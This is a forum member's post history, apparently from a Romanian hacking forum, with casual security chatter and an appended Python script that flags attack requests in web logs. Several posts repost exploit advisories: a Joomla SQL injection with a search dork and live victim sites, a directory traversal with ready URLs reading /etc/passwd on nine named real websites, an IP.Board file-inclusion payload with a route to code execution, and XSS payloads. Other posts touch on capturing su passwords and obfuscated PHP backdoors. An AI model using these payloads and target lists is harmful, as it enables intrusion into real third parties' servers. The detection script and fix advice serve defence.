
backdoor

Active Members
  • Posts: 92
  • Joined
  • Last visited

Everything posted by backdoor

  1. Just wait and see how nicely RFID cards will get cloned, especially at public institutions where access is restricted by card.
  2. h05th, first of all I'm glad you left some idiots without Gmail accounts. Second, given that this is a site with PR1, you can be sure the page is already indexed and some lights have lit up at Google. Google search: site:rstforums.com 70441-niste-mailuri-cu-parola.rst
  3. And what does an iframe have to do with PHP?
  4. gacyhouse: 1. A simpler method would be to stop using Messenger. 2. I wonder why they're cursing at you? 3. You could use "vipul666"'s method.
  5. On the system, you guys log in so I can learn a few commands too. First of all, djiolau, did you ever think of setting some proper passwords? Those really stand out. :) Second, if they're not yours, doesn't anything seem strange to you?
  6. More precisely, are you giving us the list of IPs that have TCP port 3389 open?
  7. So what if they come after you? There are plenty of us in this country.
  8. Hi. Unfortunately you'll only find such a device in corporate environments, and it will very likely have a public IP. Moreover, people steer clear of Cisco products on the VoIP side because they only work with their own phones, since they have a proprietary SIP protocol.
  9. Nice, I'm curious how many hours you have to stay logged in for an admin to come in and call "su". And what if they log in directly as root? I'll test it on other OSes too when I have a bit of time.
  10. Leaving aside China's power and the economic consequences, I'd say that, considering more than half of APNIC's IPv4 space is allocated to China, you can imagine how many thousands of servers are over there... Many of them probably still run Red Hat 5 and are compromised. Just as many people use proxies to anonymize themselves in Romania, Chinese hackers could just as well have used proxies in Europe or Africa. I don't think the Chinese government would risk an IT war, or any other kind, for obvious reasons: the Americans would find a reason to drop bombs and would knock on the EU's doors to get the Chinese removed from the European market, which they are only just starting to really exploit. That's why I don't think they'd risk a conflict (if it's the government we're talking about). Coming back to the large number of IT devices in China, I'm convinced there are people, including on this forum, who have root on .cn servers, so it wouldn't be hard for it to be a European hand.
  11. Yes, I actually wanted to post this myself because I read it recently and it made my hair stand on end, how stupid the people who wrote the driver can be. A security measure for owners until a firmware update comes out for the routers in question: disable UPnP and use port forwarding for the applications that really need it, e.g. torrents, remote desktop. Have fun. PS: Unfortunately the exploit was not made public...
  12. BRAVO! DD-WRT has fairly decent recovery procedures. But in your case I think it was well and truly dead. Note that I repaired a D-Link without a serial cable. I don't remember the exact model and procedure anymore, but I recall you roughly had to plug the Ethernet cable into the WAN port, set an IP of 10.10.x.x and connect to it over the web after giving it a reset. I did indeed struggle a bit because I couldn't understand why the hell the damn thing wasn't answering pings. On the web interface there was a file upload form with a submit button. I took the original firmware from D-Link and rewrote it.
  13. Graphic: no, it's not a good idea to do something like that to a monitor that works perfectly, for the following reasons. 1. You can't control the brightness; the inverters in monitors with fluorescent tubes raise the voltage to a few hundred volts (I've never measured it), but I know for sure it burns badly when you accidentally touch it there. 2. As you can see in the clip, the image is a bit reddish, probably because that strip gives off a yellowish/bluish light instead of a white one. 3. As danny.bv also said, you'll very probably have serious problems with light dispersion and see some streaks on the screen... 4. Taking the screen apart and putting it back without chipping it is not an easy operation. If you really want to repair the monitor, go to a computer repair shop, ask for a laptop screen with the same diagonal as your monitor and swap its lamp. It's not worth paying more than 20 lei for it.
  14. Nice! Thanks for sharing! I will take a look at it! For those who don't know, libevent is a mature library used in a lot of well-known applications like ntp, memcached, TOR, SCANssh and many others.
  15. io.kent - Why would you hide a key in the registry? 1. For example, for /HKEy_LOCAL_MACHINE/USER/Curent.../run there's msconfig, which everyone knows. 2. There are registry monitoring programs. 3. If you have something to store, you can do it in an ini file in the directory where the program is installed / run from. If that information is sensitive you can encrypt it with base64_encode(AES_encode($info,$key)); if you like Visual Basic and want to do an exercise. OK. Anyway, your little program needs the VB runtime installed; try running it on a clean XP (one you haven't put VB on).
  16. Now seriously, what vulnerability does it have? RFI? YOU'VE REALLY MADE ME CURIOUS!
  17. Don't you worry, this is just so it's a bit more frustrating for the sysadmin. As for decoding, anything you care to name can be decoded. They're all based on eval and base64_decode. Do you think a wrapper can't be put over them, or maybe you haven't heard of Xdebug - Debugger and Profiler Tool for PHP. PS: I'm glad you're posting, but whoever uses it has to be aware that what they put in there isn't undecryptable. At least don't put your Messenger IDs in it.
  18. I think they forgot to install the intermediate CA on the server. Firefox has it too :) It's SSL anyway, what are you afraid of?

  19. Info:
      [+] Site : 1337db.com
      [+] Support e-mail : submit[at]1337db.com
      >> Exploit database separated by exploit type (local, remote, DoS, etc.)
      I'm E1nzte1N 1337 Member from 1337 DataBase

      =============================================================
      -={ Joomla Module (mod_ccnewsletter) Sql Injection Vulnerability }=-
      =============================================================
      # Exploit Title : Joomla Module (mod_ccnewsletter) Sql Injection Vulnerability
      # Software Link : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,4197.html
      # Version : 1.0.7
      # Date : 23/04/2012
      # Author : E1nzte1N
      # E-mail : bluescreenfx@gmail.com
      # Category : webapps
      # Google dork : inurl:/modules/mod_ccnewsletter/helper/popup.php
      # Tested on : Windows
      ########################################################################################################
      # Exploit/p0c : http://localhost/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
      ########################################################################################################
      Bug on file popup.php, in line >> $content_id = JRequest::getVar( 'id', '', 'get', 'string');
      ========================================================================================================
        if(!isset($mainframe)) $mainframe =& JFactory::getApplication('site');
        $db =& JFactory::getDBO();
        $content_id = JRequest::getVar( 'id', '', 'get', 'string'); <<= request string value "id" without filtering.
        $query = 'SELECT * FROM #__content WHERE id ='.$content_id;
        $db->setQuery( $query );
        $row = $db->loadObject();
      =========================================================================================================
      # Demo Sites :
      => http://www.trirunners.com/modules/mod_ccnewsletter/helper/popup.php?id=71'
      => http://www.valdesi.eu/modules/mod_ccnewsletter/helper/popup.php?id=109'
      => http://www.kvalis.com/modules/mod_ccnewsletter/helper/popup.php?id=588'
      => http://www.fanticostruzioni.com/modules/mod_ccnewsletter/helper/popup.php?id=6'
      => http://www.cd-dvd-klastor.com/modules/mod_ccnewsletter/helper/popup.php?id=63'
      ########################################################################################################
      ==>> Special Thanks <<==
      ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ], And All Inj3ct0r Fans & All Hacktivist,,,
      ############################################################################
      [ Me @ SRAGEN, Bumi Sukowati, 23 April 2012 @ 13:47 PM. ]
      [ Inj3ct0r | PacketStormSecurity | Exploit-ID | Devilzc0de | Hacker-Newbie ]
      ############################################################################
      # 1337day.com [2012-04-23]

      Source: Joomla CCNewsLetter 1.0.7 SQL Injection - Packet Storm
  20. I suspect this is one of the sources of the many BSODs I've read about on the internet lately...
  21. Worth a try, though I'm convinced you won't succeed: Yahoo! Account Help | - SLN2051 - My password is not working
  22. Info
      [waraxe-2012-SA#086] - Local File Inclusion in Invision Power Board 3.3.0
      ===============================================================================
      Author: Janek Vind "waraxe"
      Date: 12. April 2012
      Location: Estonia, Tartu
      Web: http://www.waraxe.us/advisory-86.html
      CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2226

      Description of vulnerable software:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet forum software produced by Invision Power Services, Inc. It is written in PHP and primarily uses MySQL as a database management system, although support for other database engines is available.

      Vulnerable versions
      ~~~~~~~~~~~~~~~~~~~
      Affected are Invision Power Board versions 3.3.0 and 3.2.3; older versions may be vulnerable as well.

      ###############################################################################
      1. Local File Inclusion in "like.php" function "_unsubscribe"
      ###############################################################################

      CVE Information:
      ~~~~~~~~~~~~~~~~
      The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2012-2226 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

      Vulnerability Details:
      ~~~~~~~~~~~~~~~~~~~~~~
      Reason: using unsanitized user submitted data for file operations
      Attack vector: user submitted GET parameter "key"
      Preconditions:
        1. attacker must be logged in as valid user
        2. PHP must be < 5.3.4 for null-byte attacks to work
      Result: remote file disclosure, php remote code execution

      Source code snippet from vulnerable script "like.php":
      -----------------[ source code start ]---------------------------------
      protected function _unsubscribe()
      {
          /* Fetch data */
          $key = trim( IPSText::base64_decode_urlSafe( $this->request['key'] ) );
          list( $app, $area, $relId, $likeMemberId, $memberId, $email ) = explode( ';', $key );

          /* Member? */
          if ( ! $this->memberData['member_id'] )
          {
              $this->registry->output->showError( 'no_permission', 'pcgl-1' );
          }
          if ( ! $app || ! $area || ! $relId )
          {
              $this->registry->output->showError( 'no_permission', 'pcgl-1' );
          }
          if ( ( $memberId != $likeMemberId ) || ( $memberId != $this->memberData['member_id'] ) )
          {
              $this->registry->output->showError( 'no_permission', 'pcgl-2' );
          }
          if ( $email != $this->memberData['email'] )
          {
              $this->registry->output->showError( 'no_permission', 'pcgl-3' );
          }

          /* Think we're safe... */
          $this->_like = classes_like::bootstrap( $app, $area );
      -----------------[ source code end ]-----------------------------------

      As seen above, user submitted parameter "key" is first base64 decoded and then split into six variables. After multiple checks function "bootstrap()" is called, using unvalidated user submitted data for arguments.

      Source code snippet from vulnerable script "composite.php":
      -----------------[ source code start ]---------------------------------
      static public function bootstrap( $app=null, $area=null )
      {
          ..
          if( $area != 'default' )
          {
              $_file = IPSLib::getAppDir( $app ) . '/extensions/like/' . $area . '.php';
              ..
          }
          ..
          if ( ! is_file( $_file ) )
          {
              ..
              throw new Exception( "No like class available for $app - $area" );
              ..
          }
          ..
          $classToLoad = IPSLib::loadLibrary( $_file, $_class, $app );
      -----------------[ source code end ]-----------------------------------

      We can see that variable "$_file" is composed using unvalidated argument "area". Next there is a check for file existence and in case of success the next function, "loadLibrary", is called, using unvalidated argument "$_file".

      Source code snippet from vulnerable script "core.php":
      -----------------[ source code start ]---------------------------------
      static public function loadLibrary( $filePath, $className, $app='core' )
      {
          /* Get the class */
          if ( $filePath != '' )
          {
              require_once( $filePath );/*noLibHook*/
          }
      -----------------[ source code end ]-----------------------------------

      As seen above, "require_once" function is used with unvalidated argument.

      Test: we need to construct specific base64 encoded payload.
      First, semicolon-separated string:
        forums;/../../test;1;1;1;come2waraxe@yahoo.com
      Email address and other components must be valid for successful test.
      After base64 encoding:
        Zm9ydW1zOy8uLi8uLi90ZXN0OzE7MTsxO2NvbWUyd2FyYXhlQHlhaG9vLmNvbQ
      Now let's log in as valid user and then issue GET request:
        http://localhost/ipb330/index.php?app=core&module=global&section=like&do=unsubscribe&key=Zm9ydW1zOy8uLi8uLi90ZXN0OzE7MTsxO2NvbWUyd2FyYXhlQHlhaG9vLmNvbQ
      Result:
        Fatal error: Uncaught exception 'Exception' with message 'No like class available for forums - /../../test' in C:\apache_www\ipb330\admin\sources\classes\like\composite.php:333
        Stack trace:
        #0 C:\apache_www\ipb330\admin\applications\core\modules_public\global\like.php(131): classes_like::bootstrap('forums', '/../../test')
        #1 C:\apache_www\ipb330\admin\applications\core\modules_public\global\like.php(44): public_core_global_like->_unsubscribe()
        #2 C:\apache_www\ipb330\admin\sources\base\ipsController.php(306): public_core_global_like->doExecute(Object(ipsRegistry))
        #3 C:\apache_www\ipb330\admin\sources\base\ipsController.php(120): ipsCommand->execute(Object(ipsRegistry))
        #4 C:\apache_www\ipb330\admin\sources\base\ipsController.php(65): ipsController->handleRequest()
        #5 C:\apache_www\ipb330\index.php(26): ipsController::run()
        #6 {main}
        thrown in C:\apache_www\ipb330\admin\sources\classes\like\composite.php on line 333

      Potential attack scenario:
        1. Attacker registers to target forum and logs in as valid user
        2. Attacker uploads avatar picture with malicious php code to target server
        3. Attacker issues carefully crafted GET or POST request and as result gets php level access
      There are many other ways to exploit LFI (Local File Inclusion) vulnerabilities, for example by using procfs ("proc/self/environ") on *nix platforms.

      How to fix:
      ~~~~~~~~~~~
      Update to new version 3.3.1
      http://community.invisionpower.com/topic/360518-ipboard-331-ipblog-252-ipseo-152-and-updates-for-ipboard-32x-ipgallery-42x-released/

      Disclosure Timeline:
      ~~~~~~~~~~~~~~~~~~~~
      27.03.2012 Developers contacted via email
      28.03.2012 Developers confirmed upcoming patch
      11.04.2012 Developers announced new version release
      12.04.2012 Advisory released

      Contact:
      ~~~~~~~~
      come2waraxe@yahoo.com
      Janek Vind "waraxe"
      Waraxe forum: http://www.waraxe.us/forums.html
      Personal homepage: http://www.janekvind.com/
      Random project: http://albumnow.com/
      ---------------------------------- [ EOF ] ------------------------------------

      Source: Comments - Packet Storm
  23. Info
      =======================================================================
      Joomla template JA T3-Framework Directory Traversal Vulnerability 0-Day
      =======================================================================
      # Vendor: http://extensions.joomla.fr/extensions/index-des-extensions-fr/1788-Templates/4151-ja-t3-framework-joomla-15
      # Date: 2012-4-2
      # Author : indoushka
      # Tested on : Ubuntu Linux 9.10
      ########################################################
      # Dork : inurl:/index.php?jat3action=
      # Demo :
      http://www.maxim-tours.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      http://www.taqadoumy.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      http://iraneconomist.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      http://yxact.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      http://www.rtmcsumut.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      http://news.lk/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      http://www.guiaenarm.net/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      http://britanskie-kotiki.ru/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      http://profidom.com.ua/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      -------------
      http://localhost/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
      ******************************************************

      Source: Joomla JA T3-Framework Directory Traversal - Packet Storm
  24. Info
      1. OVERVIEW
      Beatz 1.x versions are vulnerable to Cross Site Scripting.

      2. BACKGROUND
      Beatz is a set of powerful Social Networking Script Joomla! 1.5 plugins that allows you to start your own favourite artist band website. Although it is just a Joomla! plugin, it comes with the full Joomla! bundle for ease of use and installation.

      3. VULNERABILITY DESCRIPTION
      Multiple parameters were not properly sanitized upon submission, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. The vulnerable plugins include: com_find, com_charts and com_videos.

      4. VERSIONS AFFECTED
      Tested in 1.x versions

      5. PROOF-OF-CONCEPT/EXPLOIT
      == Generic Joomla! 1.5 Double Encoding XSS
      http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
      == com_charts (parameter: do)
      http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
      == com_find (parameter: keyword)
      http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find
      == com_videos (parameter: video_keyword)
      http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search

      6. SOLUTION
      The vendor hasn't released the fix yet.

      7. VENDOR
      Cogzidel Technologies Pvt Ltd.
      http://www.cogzidel.com/

      8. CREDIT
      Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

      9. DISCLOSURE TIME-LINE
      2011-03-01: notified vendor
      2012-04-15: vulnerability disclosed

      10. REFERENCES
      Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss

      #yehg [2012-04-15]

      Source: Joomla Beatz 1.x Cross Site Scripting - Packet Storm
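The four Packet Storm advisories reposted in posts 19, 22, 23 and 24 each describe a request shape that shows up in a web server's access log: a quoted "id" to popup.php, a "file" parameter walking out of the template directory, a base64url "key" whose area field carries a path, and tag or event-handler markup hidden behind one or two rounds of percent-encoding. The script below is an added example for reading such logs; it is not code from the forum posts, from Packet Storm, or from the Joomla, JA T3 or IP.Board projects. It runs one rule per advisory over constructed log lines and generalises the Beatz double-encoding case to any parameter name or value. The sample log, the rule names and the template base directory JAT3_BASE are assumptions made here.

```python
"""Access-log triage for the request patterns in the four advisories above.

Added example, not code from the posts or the affected projects. Rules:
  ccnewsletter-sqli  popup.php called with a non-integer "id"
  jat3-traversal     a "file" parameter that escapes its base directory
  ipb-like-lfi       an unsubscribe "key" whose app/area fields hold path text
  xss-markup         tag/handler markup after up to two extra percent-decodes
The log lines, rule names and base directory are constructed for this example.
"""
import base64
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Common Log Format lines; payload shapes follow the advisories.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Apr/2012:13:47:00 +0000] "GET /modules/mod_ccnewsletter/helper/popup.php?id=71 HTTP/1.1" 200 512
203.0.113.5 - - [23/Apr/2012:13:47:01 +0000] "GET /modules/mod_ccnewsletter/helper/popup.php?id=71' HTTP/1.1" 500 0
203.0.113.6 - - [02/Apr/2012:10:00:00 +0000] "GET /index.php?file=..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 HTTP/1.1" 200 1200
203.0.113.6 - - [02/Apr/2012:10:00:01 +0000] "GET /index.php?file=css%2fmain.css&jat3action=gzip&type=css&v=1 HTTP/1.1" 200 640
203.0.113.7 - - [12/Apr/2012:09:00:00 +0000] "GET /index.php?app=core&module=global&section=like&do=unsubscribe&key=Zm9ydW1zOy8uLi8uLi90ZXN0OzE7MTsxO2NvbWUyd2FyYXhlQHlhaG9vLmNvbQ HTTP/1.1" 500 0
203.0.113.8 - - [15/Apr/2012:09:00:00 +0000] "GET /beatz/index.php?do=listAll&keyword=++Search%22%3E%3Cimg+src=0+onerror=prompt(/XSS/)%3E&option=com_find HTTP/1.1" 200 800
203.0.113.9 - - [15/Apr/2012:09:00:01 +0000] "GET /beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e=1 HTTP/1.1" 200 800
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
XSS_RE = re.compile(r'<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:', re.I)
IPB_FIELD_RE = re.compile(r'^[A-Za-z0-9_]+$')   # what a sane app/area name looks like
JAT3_BASE = '/srv/www/templates'                # hypothetical template root (assumption)

def percent_decode_layers(value, rounds=2):
    """Successive percent-decodings of value; stops early once nothing changes."""
    layers = [value]
    for _ in range(rounds):
        nxt = unquote(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers

def path_stays_under(relative, base):
    """Containment check: join, normalise, and require the result to stay inside base."""
    base = posixpath.normpath(base)
    resolved = posixpath.normpath(posixpath.join(base, relative.replace('\\', '/')))
    return resolved == base or resolved.startswith(base + '/')

def check_popup_id(path, params):
    if path.endswith('/mod_ccnewsletter/helper/popup.php') and 'id' in params:
        if not params['id'].isdigit():          # the query concatenates id unquoted
            return 'ccnewsletter-sqli'
    return None

def check_t3_file(path, params):
    if 'jat3action' in params and 'file' in params:
        for candidate in percent_decode_layers(params['file']):
            if not path_stays_under(candidate, JAT3_BASE):
                return 'jat3-traversal'
    return None

def check_ipb_key(path, params):
    if params.get('do') != 'unsubscribe' or 'key' not in params:
        return None
    key = params['key']
    try:  # base64url without padding, the encoding the advisory's payload uses
        raw = base64.urlsafe_b64decode(key + '=' * (-len(key) % 4)).decode('utf-8')
    except ValueError:
        return None
    fields = raw.split(';')                     # app;area;relId;likeMemberId;memberId;email
    if len(fields) >= 2 and not all(IPB_FIELD_RE.match(f) for f in fields[:2]):
        return 'ipb-like-lfi'
    return None

def check_xss(path, params):
    # Scan names as well as values: the double-encoded PoC puts the payload in a name.
    for text in list(params.keys()) + list(params.values()):
        if any(XSS_RE.search(layer) for layer in percent_decode_layers(text)):
            return 'xss-markup'
    return None

CHECKS = (check_popup_id, check_t3_file, check_ipb_key, check_xss)

def analyze_line(line):
    """Rule names that fire for one log line (empty list if clean or unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group('target'))
    params = dict(parse_qsl(parts.query, keep_blank_values=True))  # one decode round
    return [name for name in (check(parts.path, params) for check in CHECKS) if name]

def analyze_log(text):
    """[(client_ip, rule_name), ...] for every flagged line, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits.extend((m.group('ip'), name) for name in analyze_line(line))
    return hits

if __name__ == '__main__':
    for ip, rule in analyze_log(SAMPLE_LOG):
        print(f'{ip}\t{rule}')
```

The path_stays_under check is also the shape of the server-side fix for the traversal and inclusion cases: resolve the user-supplied piece against a fixed base and refuse anything that lands outside it, or, better, match the piece against a whitelist the way IPB_FIELD_RE does for the app and area fields. For the popup.php case the fix is to cast id to an integer (or bind it as a query parameter) before it reaches the SQL string.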